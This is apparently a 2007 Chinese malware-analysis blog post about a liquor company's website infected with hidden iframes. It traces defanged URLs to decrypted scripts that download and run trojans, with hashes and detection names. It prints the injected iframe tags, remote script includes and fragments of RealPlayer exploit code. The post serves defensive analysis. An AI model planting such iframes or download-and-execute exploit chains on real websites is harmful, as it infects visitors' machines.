巴马某神酒业有限责任公司网站被挂马Worm.Win32.Downloader/Trojan.Win32.Mnless

endurer 原创
2007-12-13 第1

检查首页代码,发现被多次加入代码:
/---
<ifame src=hxxp://A**A.ll*sging**.com/ww/new05.htm?075 widTh=1 naMe='6005' height=1></iframe>

<ifame src=hxxp://A**A.ll*sging**.com/ww/new05.htm?013 width=1 height=1></iframe>
<ifame src=hxxp://www.f**Oafa**u.infO/ms30.htm?823 width=1 Name='6016' height=1></ifraMe><ifame src=hxxp://A**A.ll*sging**.com/ww/new05.hTm?075 wIdth=1 name='6016' height=1></iframe>
---/

hxxp://A**A.ll*sging**.com/ww/new05.htm?075 包含代码:
/---
<ifame src=hxxp://A**A.ll*sging**.com/aa/haha.htm width=5 height=5></iframe>
<ifame src=hxxp://A**A.ll*sging**.com/aa/gege.htm width=5 height=5></iframe>
---/

hxxp://A**A.ll*sging**.com/ww/new05.htm?013

hxxp://A**A.ll*sging**.com/aa/haha.htm 经2次解密得到原代码,功能是检查cookie变量OK,输出代码:
/---
<script src=hxxp://aa.ll*sging**.com/aa/11.js></script>
<script src=hxxp://aa.ll*sging**.com/aa/bb.js></script>
<ifame width='10' height='10' src='hxxp://A**A.ll*sging**.com/aa/bf.html'></iframe>
---/
利用暴风影音漏洞,及BaiduBar.Tool下载hxxp://down.ll*sging**.com/bb/bd.cab

文件说明符 : D:/test/bd.cab
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-12-10 23:45:22
修改时间 : 2007-12-10 23:45:30
访问时间 : 2007-12-10 0:0:0
大小 : 34045 字节 33.253 KB
MD5 : 67e8a38e7570de02ec1e3b0fec7ac9d9
SHA1: 9EF39949C850CFE8C03F76FA0DFC7EC3BD286254
CRC32: 888380b0

文件说明符 : D:/test/bd.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-11-27 5:8:28
修改时间 : 2007-11-27 5:8:28
访问时间 : 2007-12-10 0:0:0
大小 : 34837 字节 34.21 KB
MD5 : 865188f4f8583f4c0728553b04375261
SHA1: BF3B97AE81F49CAF96268EF4CFF5B96C1818EB88
CRC32: deed8b5c

Kaspersky 报为 Worm.Win32.Downloader.bi
瑞星 报为 Trojan.Win32.Mnless.znc》nspack

hxxp://A**A.ll*sging**.com/aa/11.js 经1次解密得到原代码,功能是下载hxxp://down.ll*sging**.com/bb/014.exe,保存为ntuser.com并运行。

文件说明符 : D:/test/014.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-12-10 23:42:45
修改时间 : 2007-12-10 23:42:46
访问时间 : 2007-12-10 0:0:0
大小 : 34854 字节 34.38 KB
MD5 : 19a5e9859be11640446fd3d7b6533d23
SHA1: 5B3A4028A4E85422ACAA3F7F974ECBB5D35E936B
CRC32: 57901cec
Kaspersky 报为 Worm.Win32.Downloader.bd
瑞星 报为 Backdoor.Win32.Agent.yos》nspack

hxxp://A**A.ll*sging**.com/aa/bb.js

hxxp://A**A.ll*sging**.com/aa/ppp.js

hxxp://A**A.ll*sging**.com/aa/bf.html 为
联众ConnectAndEnterRoom ActiveX控件栈溢出漏洞代码。

可参考:
联众ConnectAndEnterRoom ActiveX控件栈溢出漏洞
​​​http://www.nsfocus.net/vulndb/11122​

hxxp://A**A.ll*sging**.com/aa/gege.htm 经2次解密得到原代码,为RealPlayer 漏洞利用代码,其中末段代码挺有意思:
/---
PayLoad+="YuanGe";Real.Import("c:\\Program Files\\NetMeeting\\TestSnd.wav",PayLoad,"",0,0)};RealExploit();)
---/

hxxp://www.f**Oafa**u.infO/ms30.htm?823 包含代码
/---
<HTML>
<ifame src="88/881.htm" width="20" height="0" frameborder="0"></iframe>
<ifame src="88/883.htm" width="1" height="1" frameborder="0"></iframe>
</HTML>
---/

hxxp://www.f**Oafa**u.infO/88/881.htm 利用MS06-014: msadco.dll 漏洞 下载hxxp://www.*6*8y**u*.cn/68down.exe,保存为C:/MicroSoft.pif,通过创建文件C:/MicroSoft.vbs来启动。代码中的一个变量名为:Qq784378237

文件说明符 : D:/test/68down.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-12-10 23:44:5
修改时间 : 2007-12-10 23:44:6
访问时间 : 2007-12-10 0:0:0
大小 : 31876 字节 31.132 KB
MD5 : 7f29c1dbaae355933130030aed699672
SHA1: 1A5EDE06B6CCD19BB7FB9AF3E9B0456E847BFDD0
CRC32: 2738d5ad

Kaspersky 报为 Worm.Win32.Downloader.cg
瑞星 报为 Trojan.Win32.Mnless.zyt

hxxp://www.f**Oafa**u.infO/88/883.htm 经2次解密得到原代码,同样为 RealPlayer 漏洞利用代码,其中末段代码与上面的不同:
/---
PayLoad += "ChuiZi";
Real.Import("c:\\Program Files\\NetMeeting\\TestSnd.wav", PayLoad,"", 0, 0);

RealExploit();)
---/